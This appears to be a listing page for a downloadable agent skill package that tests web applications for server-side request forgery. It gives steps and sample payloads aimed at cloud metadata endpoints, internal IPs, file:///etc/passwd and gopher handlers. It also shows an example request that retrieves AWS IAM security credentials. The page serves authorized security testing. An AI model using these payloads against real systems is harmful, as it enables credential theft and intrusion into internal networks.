Skills Development Server-Side Request Forgery Testing

Server-Side Request Forgery Testing

v20260406
performing-ssrf-vulnerability-exploitation
This tool is designed for security professionals to test for Server-Side Request Forgery (SSRF) vulnerabilities. It systematically probes user-controllable URL parameters to identify access to internal network services, cloud metadata endpoints (AWS/GCP/Azure), and restricted local resources. It supports various payload techniques, including protocol handlers (gopher, file), IP encoding, and DNS rebinding, making it essential for thorough security assessments and penetration testing.
Get Skill
281 downloads
Overview

When to Use

  • When conducting security assessments that involve performing ssrf vulnerability exploitation
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Familiarity with security operations concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Instructions

  1. Install dependencies: pip install requests
  2. Identify URL parameters in the target application that accept URLs or hostnames.
  3. Test SSRF payloads:
    • Cloud metadata: http://169.254.169.254/latest/meta-data/
    • Internal services: http://127.0.0.1:port/, http://10.0.0.1/
    • Protocol handlers: file:///etc/passwd, gopher://, dict://
    • Bypass techniques: IP encoding, DNS rebinding, URL redirects
  4. Analyze responses for information disclosure or internal access confirmation.
  5. Generate a vulnerability assessment report.
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json

Examples

AWS Metadata SSRF

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.

Info
Category Development
Name performing-ssrf-vulnerability-exploitation
Version v20260406
Size 8.7KB
Updated At 2026-04-12
Language